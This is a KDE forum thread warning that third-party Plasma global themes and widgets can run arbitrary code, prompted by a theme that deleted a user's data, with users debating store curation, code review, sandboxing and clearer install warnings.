WARNING: Global themes and widgets created by 3rd party developers for Plasma can and will run arbitrary code. You are encouraged to exercise extreme caution when using these products

A user has had a bad experience installing a global theme on Plasma and lost personal data.

Global themes do not only change the look of Plasma, but also the behavior. To do this they run code, and this code can be faulty, as in the case mentioned above. The same goes for widgets and plasmoids.

We are calling on the community to help us locate and quarantine defective software by using the “Report” buttons available on each item in the KDE Store.

Please see the image below to locate them.

Meanwhile, KDE is taking measures to properly warn users before each download and we are also putting in place ways of auditing and curating what is uploaded to the KDE store.

Nevertheless, this will take time and resources. We recommend all users to be careful when installing and running software not provided directly by KDE or your distros.

And remember to report any faulty products you find!

Edit: Locking this thread. Devs are working on it. End of.

4 Likes

The problem is that the process is too much abstracted away, obfuscated behind automation.

There should be a feature for users to easily inspect the code in its entirety without downloading the theme/widget/plasmoid/whatever, directly on the KDE store website.

2 Likes

This is pretty bad. Frankly only themes screened by KDE should even make it to the KDE store, and if there’s an update then it should be screened too before being accepted. Anything but this.

Well, that would make it more like snap, flatpak, or even appstore and google play.
And not even canonical seems to be able to keep dirty apps out of snap.

The idea of the KDE store is it is community driven.
If KDE have to make themselves 100% liable for every single line of code, then might as well kiss the whole thing good bye.

Easy code review is a must, is the source link not enough?
Or are there stuff that does not provide a link to the source?

Example;
image

There is a general misconception to linux users that since you have limited permission a malware can’t harm your system. Well, it can still harm your files which are under your home and don’t need special permissions to access :slight_smile:

3 Likes

The problem, as always, is screened how and by whom? Because saying “SCREEN ALL THE THINGS!” is easy, but is much more difficult to implement, especially in a community run by mostly volunteers. Hence the appeal to community help.

You must remember that KDE is a porous community and relies on the goodwill of its members. Would you, for example, be willing to spend, say, a couple of hours a day reviewing the code of hundreds of items?

If your answer is “yes”, allow me to direct you to where you can get started.

If the answer is “no”, there is nothing wrong with that, but then you will start to appreciate the dimension of the problem.

7 Likes

Yeah I guess not. Unless there’s a reliable way to automatically scan the source code for functions it shouldn’t have.

According to the Halting problem, there isn’t such a way and there can never be.

If someday we develop such an algorithm (maybe in quantum computing) then this will be the end of bugs and all types of malware :slight_smile:

1 Like

The problem with that hypothesis is that it assumes no new languages would ever be needed. Or that an ai in that future would be able to create rather than just copy. scary

It’s like the argument the nvidia CEO had about “kids don’t need to learn coding any more, ai will do that in the future”. :person_facepalming:
An ai is only as good as what it can copy, so if no new code is ever done, the future of coding would come to a halt when it comes to new languages and development. Pretty boring future if you ask me.

But this is maybe a bit too off topic.

I think KDE has the technical means to minimize the damage while installing widgets and themes from online stores.

Widgets and themes install locations are already known, and Plasma already has the GUI to show/fetch and install them, so we simply need to run the installation process inside a sandboxed env like Firejail and limit the writing only to those specific locations, like this we can be sure that user files are at least kept safe from any external danger.

It has nothing to do with languages or any other tools. It’s just plain maths which apply to any kind of computational device that can be described by a Turing machine (I just have no idea if a general purpose quantum computer can be described by a turing machine).

1 Like

It has everything to do with that. Doing something faster has nothing to do with coming up with new computer languages and new ways to create code.
A computer has never to this day created something new, only humans have.
What you are talking about is something that would bordeline to an actual intelligence, a life.
But again, off topic, but the philosophical thought-processes about these things makes me very exited. :innocent:

I do think it bears mentioning here that, AFAICT, for the user in question, the source of their interaction with the KDE Store to begin with wasn’t navigating to store.kde.org, but was through the “Get New…” buttons contained within Plasma itself.

There were several lengthy Reddit threads on the topic, but IMO one action that would quickly help mitigate even a little bit of the risk here would be to significantly beef up the warning text here (image from David Edmundson’s blog):

To something like:

“The content available here has been uploaded by users like you, includes executable program code, and has not been reviewed by anyone. Follow the instructions at here to review these add-ons before installation. KDE assumes no responsibility for the functionality, stability or safety of these add-ons.”

Of course, directly linking to the source code in that panel would be better, just thinking of what the fastest path to some mitigation might be.

3 Likes

Some already created a MR for this :slight_smile:

2 Likes

I would prefer a more clear warning mentioning that such scripts may even steal or alter you personal files and data, but I guess that would be too aggressive for the average user

1 Like

maybe i’m not average enough, but the language that was there already scared me off wanting to mess with it

i choose among the breeze themes and only install widgets that have many many reviews saying how it works that are months to years old.

i think, stick to what comes with KDE and leave the “get more…” to the adventurous with strong recovery methods.

1 Like

The problem with that, is not everyone can make sense of code.

Well, I hate to be the guy who says that, but if someone can’t validate for themselves any 3rd party source code, they need to treat it as closed source. That’s really unfortunate but it is what it is :frowning:

2 Likes

I agree. My partner, for example can’t make head nor tail of code, even when it’s as human readable as Python. Fortunately she has me.

But not everyone is in that position. So they really need to not jump in blindly, and should avoid shiny shiny stuff untill they’ve checked it out with someone more knowledgeable, preferably by joining a forum such as this, but well, most people the less they know, the more likely they are to do something silly without asking, and most certainly by not joining a forum.

1 Like

One possible way is to show most downloaded (e.g. in last week) first, instead of recently updated. So what you download is probably already “tested” by many users.

2 Likes